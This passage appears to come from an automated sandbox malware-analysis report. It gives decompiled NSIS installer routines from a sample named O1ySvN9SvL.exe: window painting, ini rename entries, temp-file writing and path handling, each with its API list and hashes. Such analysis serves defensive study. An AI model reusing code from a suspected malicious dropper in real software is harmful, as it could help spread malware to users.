                						_a12 = _t126 - _v32.top;
                						asm("cdq");
                						asm("cdq");
                						asm("cdq");
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {
                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextA(_t128, "xwkwrbeiqiuu Setup", 0xffffffff,  &_v32, 0x820);
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) {
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                					_t115 =  *0x423f24; // 0x0
                					 *((intOrPtr*)(_t102 + 4)) = _t115;
                				}
                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                			}


                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,?), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,xwkwrbeiqiuu Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$xwkwrbeiqiuu Setup
                • API String ID: 941294808-2097528622
                • Opcode ID: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                • Instruction ID: 28e048358fdb56e3a71f0bf3a5ff7a413e245bc8018749bf15ad205f69265f0b
                • Opcode Fuzzy Hash: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                • Instruction Fuzzy Hash: 4241BA71804249AFCB058FA4DD459BFBBB9FF48315F00802AF951AA1A0C738AA50DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00405842() {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t15;
                				long _t16;
                				intOrPtr _t18;
                				int _t20;
                				void* _t28;
                				long _t29;
                				intOrPtr* _t37;
                				int _t43;
                				void* _t44;
                				long _t47;
                				CHAR* _t49;
                				void* _t51;
                				void* _t53;
                				intOrPtr* _t54;
                				void* _t55;
                				void* _t56;
                
                				_t15 = E00405DDA(1);
                				_t49 =  *(_t55 + 0x18);
                				if(_t15 != 0) {
                					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                					if(_t20 != 0) {
                						L16:
                						 *0x423fb0 =  *0x423fb0 + 1;
                						return _t20;
                					}
                				}
                				 *0x4226c0 = 0x4c554e;
                				if(_t49 == 0) {
                					L5:
                					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422138, 0x400);
                					if(_t16 != 0 && _t16 <= 0x400) {
                						_t43 = wsprintfA(0x421d38, "%s=%s\r\n", 0x4226c0, 0x422138);
                						_t18 =  *0x423f28; // 0x74d188
                						_t56 = _t55 + 0x10;
                						_push( *((intOrPtr*)(_t18 + 0x128)));
                						_push(0x422138);
                						E00405B16(_t43, 0x400, 0x422138);
                						_t20 = E004057CB(0x422138, 0xc0000000, 4);
                						_t53 = _t20;
                						 *(_t56 + 0x14) = _t53;
                						if(_t53 == 0xffffffff) {
                							goto L16;
                						}
                						_t47 = GetFileSize(_t53, 0);
                						_t7 = _t43 + 0xa; // 0xa
                						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                							L15:
                							_t20 = CloseHandle(_t53);
                							goto L16;
                						} else {
                							if(E00405740(_t51, "[Rename]\r\n") != 0) {
                								_t28 = E00405740(_t26 + 0xa, 0x4093a0);
                								if(_t28 == 0) {
                									L13:
                									_t29 = _t47;
                									L14:
                									E0040578C(_t51 + _t29, 0x421d38, _t43);
                									SetFilePointer(_t53, 0, 0, 0);
                									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                									GlobalFree(_t51);
                									goto L15;
                								}
                								_t37 = _t28 + 1;
                								_t44 = _t51 + _t47;
                								_t54 = _t37;
                								if(_t37 >= _t44) {
                									L21:
                									_t53 =  *(_t56 + 0x14);
                									_t29 = _t37 - _t51;
                									goto L14;
                								} else {
                									goto L20;
                								}
                								do {
                									L20:
                									 *((char*)(_t43 + _t54)) =  *_t54;
                									_t54 = _t54 + 1;
                								} while (_t54 < _t44);
                								goto L21;
                							}
                							E00405AF4(_t51 + _t47, "[Rename]\r\n");
                							_t47 = _t47 + 0xa;
                							goto L13;
                						}
                					}
                				} else {
                					CloseHandle(E004057CB(_t49, 0, 1));
                					_t16 = GetShortPathNameA(_t49, 0x4226c0, 0x400);
                					if(_t16 != 0 && _t16 <= 0x400) {
                						goto L5;
                					}
                				}
                				return _t16;
                			}


                APIs
                  • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                  • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                  • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
                • GetShortPathNameA.KERNEL32 ref: 00405898
                • GetShortPathNameA.KERNEL32 ref: 004058B5
                • wsprintfA.USER32 ref: 004058D3
                • GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D38,00000000,-0000000A,004093A0,00000000,[Rename]), ref: 00405979
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040598B
                • GlobalFree.KERNEL32 ref: 00405992
                • CloseHandle.KERNEL32(00000000), ref: 00405999
                  • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                  • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                Strings
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$8!B$[Rename]
                • API String ID: 3772915668-1989604195
                • Opcode ID: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                • Instruction ID: 485c0dd97f26b0c044a9bc16f28733e4b9e22d15a5ab270111e081fcc94942a4
                • Opcode Fuzzy Hash: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                • Instruction Fuzzy Hash: 6F4102B1604B01BBE7206B659D49F6B3A6CDF45725F04043AFA05F62D1E67CA8018EBE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00405B16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                				struct _ITEMIDLIST* _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _t30;
                				CHAR* _t31;
                				signed int _t33;
                				signed int _t34;
                				signed int _t45;
                				char _t47;
                				CHAR* _t57;
                				char _t61;
                				signed int _t63;
                				intOrPtr _t67;
                				signed int _t75;
                				char* _t76;
                				signed int _t84;
                				signed int _t86;
                				void* _t87;
                
                				_t75 = _a8;
                				if(_t75 < 0) {
                					_t67 =  *0x4236fc; // 0x74f2a0
                					_t75 =  *(_t67 - 4 + _t75 * 4);
                				}
                				_t30 =  *0x423f58; // 0x74eb84
                				_t76 = _t75 + _t30;
                				_t31 = 0x422ec0;
                				_t57 = 0x422ec0;
                				if(_a4 - 0x422ec0 < 0x800) {
                					_t57 = _a4;
                					_a4 = _a4 & 0x00000000;
                				}
                				while(1) {
                					_t61 =  *_t76;
                					_a11 = _t61;
                					if(_t61 == 0) {
                						break;
                					}
                					__eflags = _t57 - _t31 - 0x400;
                					if(_t57 - _t31 >= 0x400) {
                						break;
                					}
                					_t76 = _t76 + 1;
                					__eflags = _t61 - 0xfc;
                					if(__eflags <= 0) {
                						if(__eflags != 0) {
                							 *_t57 = _t61;
                							_t57 =  &(_t57[1]);
                							__eflags = _t57;
                						} else {
                							 *_t57 =  *_t76;
                							_t57 =  &(_t57[1]);
                							_t76 = _t76 + 1;
                						}
                						continue;
                					}
                					_t33 =  *((char*)(_t76 + 1));
                					_t63 =  *_t76;
                					_t84 = (_t33 & 0x0000007f) << 0x00000007 | _t63 & 0x0000007f;
                					_v24 = _t63;
                					_v16 = _t33;
                					_t34 = _t33 | 0x00008000;
                					_v20 = _t63 | 0x00008000;
                					_t76 = _t76 + 2;
                					__eflags = _a11 - 0xfe;
                					_v12 = _t34;
                					if(_a11 != 0xfe) {
                						__eflags = _a11 - 0xfd;
                						if(_a11 != 0xfd) {
                							__eflags = _a11 - 0xff;
                							if(_a11 == 0xff) {
                								__eflags = (_t34 | 0xffffffff) - _t84;
                								E00405B16(_t57, _t76, _t84, _t57, (_t34 | 0xffffffff) - _t84);
                							}
                							L32:
                							_t57 =  &(_t57[lstrlenA(_t57)]);
                							_t31 = 0x422ec0;
                							continue;
                						}
                						__eflags = _t84 - 0x1d;
                						if(_t84 != 0x1d) {
                							__eflags = (_t84 << 0xa) + 0x424000;
                							E00405AF4(_t57, (_t84 << 0xa) + 0x424000);
                						} else {
                							E00405A52(_t57,  *0x423f24);
                						}
                						__eflags = _t84 + 0xffffffeb - 7;
                						if(_t84 + 0xffffffeb < 7) {
                							L23:
                							E00405D03(_t57);
                						}
                						goto L32;
                					}
                					__eflags =  *0x423fa4;
                					_t86 = 2;
                					if( *0x423fa4 != 0) {
                						_t86 = 4;
                					}
                					_t45 = _v24;
                					__eflags = _t45;
                					if(_t45 >= 0) {
                						__eflags = _t45 - 0x25;
                						if(_t45 != 0x25) {
                							__eflags = _t45 - 0x24;
                							if(_t45 == 0x24) {
                								GetWindowsDirectoryA(_t57, 0x400);
                								_t86 = 0;
                							}
                							while(1) {
                								__eflags = _t86;
                								if(_t86 == 0) {
                									break;
                								}
                								_t86 = _t86 - 1;
                								_t47 = SHGetSpecialFolderLocation( *0x423f24,  *(_t87 + _t86 * 4 - 0x14),  &_v8);
                								__eflags = _t47;
                								if(_t47 != 0) {
                									L18:
                									 *_t57 =  *_t57 & 0x00000000;
                									__eflags =  *_t57;
                									continue;
                								}
                								__imp__SHGetPathFromIDListA(_v8, _t57);
                								_a8 = _t47;
                								__imp__CoTaskMemFree(_v8);
                								__eflags = _a8;
                								if(_a8 != 0) {
                									break;
                								}
                								goto L18;
                							}
                							L20:
                							__eflags =  *_t57;
                							if( *_t57 == 0) {
                								goto L23;
                							}
                							L21:
                							__eflags = _v16 - 0x1a;
                							if(_v16 == 0x1a) {
                								lstrcatA(_t57, "\\Microsoft\\Internet Explorer\\Quick Launch");
                							}
                							goto L23;
                						}
                						GetSystemDirectoryA(_t57, 0x400);
                						goto L20;
                					}
                					E004059DB(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t45 & 0x0000003f) +  *0x423f58, _t57, _t45 & 0x00000040);
                					__eflags =  *_t57;
                					if( *_t57 != 0) {
                						goto L21;
                					}
                					E00405B16(_t57, _t76, _t86, _t57, _v16);
                					goto L20;
                				}
                				 *_t57 =  *_t57 & 0x00000000;
                				if(_a4 == 0) {
                					return _t31;
                				}
                				return E00405AF4(_a4, _t31);
                			}


                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 00405C04
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000400,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405C17
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C6E
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405CC2
                Strings
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-1677557876
                • Opcode ID: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                • Instruction ID: fbd4eb8f0a1d10871977b41ef6ccbc0aa49b8648b95f2323881667dae7feb8a3
                • Opcode Fuzzy Hash: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                • Instruction Fuzzy Hash: 955146B1E08B54ABEF215F748D84B6B3BA8DB11314F248277E512B62C1D23C99419F5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E004026DF(void __ecx, void* __eflags) {
                				void* _t23;
                				void* _t29;
                				long _t34;
                				struct _OVERLAPPED* _t49;
                				void* _t52;
                				void* _t54;
                				void* _t55;
                				CHAR* _t56;
                				void* _t59;
                				void* _t60;
                				void* _t61;
                
                				_t51 = __ecx;
                				 *((intOrPtr*)(_t61 - 0x3c)) = 0xfffffd66;
                				_t55 = E00402A85(_t49);
                				_t23 = E00405654(_t55);
                				_push(_t55);
                				if(_t23 == 0) {
                					lstrcatA(E004055E7(E00405AF4("C:\Users\alfons\AppData\Local\Temp", "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                					_t56 = 0x4097f8;
                				} else {
                					_push(0x4097f8);
                					E00405AF4();
                				}
                				E00405D03(_t56);
                				E004057AC(_t56);
                				_t29 = E004057CB(_t56, 0x40000000, 2);
                				 *(_t61 + 8) = _t29;
                				if(_t29 != 0xffffffff) {
                					_t34 =  *0x423f2c; // 0x7e00
                					 *(_t61 - 0x2c) = _t34;
                					_t54 = GlobalAlloc(0x40, _t34);
                					if(_t54 != _t49) {
                						E004032AF(_t49);
                						E0040327D(_t54,  *(_t61 - 0x2c));
                						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
                						 *(_t61 - 0x30) = _t59;
                						if(_t59 != _t49) {
                							E00402F71(_t51,  *((intOrPtr*)(_t61 - 0x20)), _t49, _t59,  *(_t61 - 0x1c));
                							while( *_t59 != _t49) {
                								_t51 =  *_t59;
                								_t60 = _t59 + 8;
                								 *(_t61 - 0x40) =  *_t59;
                								E0040578C( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                								_t59 = _t60 +  *(_t61 - 0x40);
                							}
                							GlobalFree( *(_t61 - 0x30));
                						}
                						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x34, _t49);
                						GlobalFree(_t54);
                						 *((intOrPtr*)(_t61 - 0x3c)) = E00402F71(_t51, 0xffffffff,  *(_t61 + 8), _t49, _t49);
                					}
                					CloseHandle( *(_t61 + 8));
                					_t56 = 0x4097f8;
                				}
                				_t52 = 0xfffffff3;
                				if( *((intOrPtr*)(_t61 - 0x3c)) < _t49) {
                					_t52 = 0xffffffef;
                					DeleteFileA(_t56);
                					 *((intOrPtr*)(_t61 - 4)) = 1;
                				}
                				_push(_t52);
                				E00401423();
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t61 - 4));
                				return 0;
                			}

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040271C
                • GlobalAlloc.KERNEL32(00000040,00007E00,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040275C
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402778
                • GlobalFree.KERNEL32 ref: 004027B1
                • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027C3
                • GlobalFree.KERNEL32 ref: 004027CA
                • CloseHandle.KERNEL32(?), ref: 004027E2
                • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 004027F9
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                • API String ID: 3508600917-4142310990
                • Opcode ID: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                • Instruction ID: fcc06673606a62174d5ec44ae6416698489d1e6bc37419cb4e18d2f49fa452d4
                • Opcode Fuzzy Hash: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                • Instruction Fuzzy Hash: 8A317A72C00524BBCB116FA5CD89DAF7A78EF08364B10823AF924772D1CB7C5C019BA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402BCA(struct HWND__* _a4, intOrPtr _a8, CHAR* _a12) {
                				intOrPtr _t5;
                				int _t7;
                				CHAR* _t9;
                				int _t18;
                				int _t19;
                				struct HWND__* _t23;
                				void* _t24;
                
                				_t5 = _a8;
                				_t23 = _a4;
                				if(_t5 == 0x110) {
                					SetTimer(_t23, 1, 0xfa, 0);
                					 *0x40b000 = _a12;
                					_t5 = 0x113;
                				}
                				if(_t5 == 0x113) {
                					_t19 =  *0x4170d0; // 0x0
                					_t7 =  *0x41f0e0;
                					if(_t19 >= _t7) {
                						_t19 = _t7;
                					}
                					_t18 = MulDiv(_t19, 0x64, _t7);
                					_t9 =  *0x40b000; // 0x0
                					if(_t9 != 0) {
                						wsprintfA(0x417090, _t9, _t18);
                						_t24 = _t24 + 0xc;
                						SetWindowTextA(_t23, 0x417090);
                						SetDlgItemTextA(_t23, 0x406, 0x417090);
                						ShowWindow(_t23, 5);
                					}
                					if(( *0x409250 & 0x00000001) != 0) {
                						wsprintfA(0x417090, "... %d%%", _t18);
                						E00404E9F(0, 0x417090);
                					}
                				}
                				return 0;
                			}

                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BEC
                • MulDiv.KERNEL32(00000000,00000064,?), ref: 00402C16
                • wsprintfA.USER32 ref: 00402C35
                • SetWindowTextA.USER32(?,00417090), ref: 00402C3C
                • SetDlgItemTextA.USER32 ref: 00402C49
                • ShowWindow.USER32(?,00000005,?,00000406,00417090), ref: 00402C51
                • wsprintfA.USER32 ref: 00402C67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: TextWindowwsprintf$ItemShowTimer
                • String ID: ... %d%%
                • API String ID: 2110197580-2449383134
                • Opcode ID: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                • Instruction ID: 99e2debb18c7311ff8eca1142aa4f476a7479ee74c8687a77fe961922a259f3d
                • Opcode Fuzzy Hash: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                • Instruction Fuzzy Hash: FC1186347443197BE2249B249D49FAB779CEB49754F004036FE49F63D1D7B8AC4086AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405D03(CHAR* _a4) {
                				char _t5;
                				char _t7;
                				char* _t15;
                				char* _t16;
                				CHAR* _t17;
                
                				_t17 = _a4;
                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                					_t17 =  &(_t17[4]);
                				}
                				if( *_t17 != 0 && E00405654(_t17) != 0) {
                					_t17 =  &(_t17[2]);
                				}
                				_t5 =  *_t17;
                				_t15 = _t17;
                				_t16 = _t17;
                				if(_t5 != 0) {
                					do {
                						if(_t5 > 0x1f &&  *((char*)(E00405612("*?|<>/\":", _t5))) == 0) {
                							E0040578C(_t16, _t17, CharNextA(_t17) - _t17);
                							_t16 = CharNextA(_t16);
                						}
                						_t17 = CharNextA(_t17);
                						_t5 =  *_t17;
                					} while (_t5 != 0);
                				}
                				 *_t16 =  *_t16 & 0x00000000;
                				while(1) {
                					_t16 = CharPrevA(_t15, _t16);
                					_t7 =  *_t16;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t16 =  *_t16 & 0x00000000;
                					if(_t15 < _t16) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                • CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-3021078146
                • Opcode ID: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                • Instruction ID: 5656e1994ff3a00564090885ccfb713e68030b48685137941c4d6139e5eb1e54
                • Opcode Fuzzy Hash: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                • Instruction Fuzzy Hash: 8E11BF61804E9529FB3216385C48B7B7FD8CF67760F18847BE8C5722C2D67C5C829A6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403F5C(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t35;
                				long _t37;
                				void* _t40;
                				long* _t49;
                
                				if(_a4 + 0xfffffecd > 5) {
                					L15:
                					return 0;
                				}
                				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                				if(_t49 == 0) {
                					goto L15;
                				}
                				_t35 =  *_t49;
                				if((_t49[5] & 0x00000002) != 0) {
                					_t35 = GetSysColor(_t35);
                				}
                				if((_t49[5] & 0x00000001) != 0) {
                					SetTextColor(_a8, _t35);
                				}
                				SetBkMode(_a8, _t49[4]);
                				_t37 = _t49[1];
                				_v16.lbColor = _t37;
                				if((_t49[5] & 0x00000008) != 0) {
                					_t37 = GetSysColor(_t37);
                					_v16.lbColor = _t37;
                				}
                				if((_t49[5] & 0x00000004) != 0) {
                					SetBkColor(_a8, _t37);
                				}
                				if((_t49[5] & 0x00000010) != 0) {
                					_v16.lbStyle = _t49[2];
                					_t40 = _t49[3];
                					if(_t40 != 0) {
                						DeleteObject(_t40);
                					}
                					_t49[3] = CreateBrushIndirect( &_v16);
                				}
                				return _t49[3];
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                • Instruction ID: de1dc0ced46b62e01148019097b19380805317e3bca555cad6edf46d623340dd
                • Opcode Fuzzy Hash: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                • Instruction Fuzzy Hash: C6218471904745ABC7219F68DD08B5BBFF8AF01714F048969F995F22E0D738E904CB55
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00404E9F(CHAR* _a4, CHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				CHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				CHAR* _t26;
                				signed int _t27;
                				CHAR* _t28;
                				long _t29;
                				signed int _t39;
                
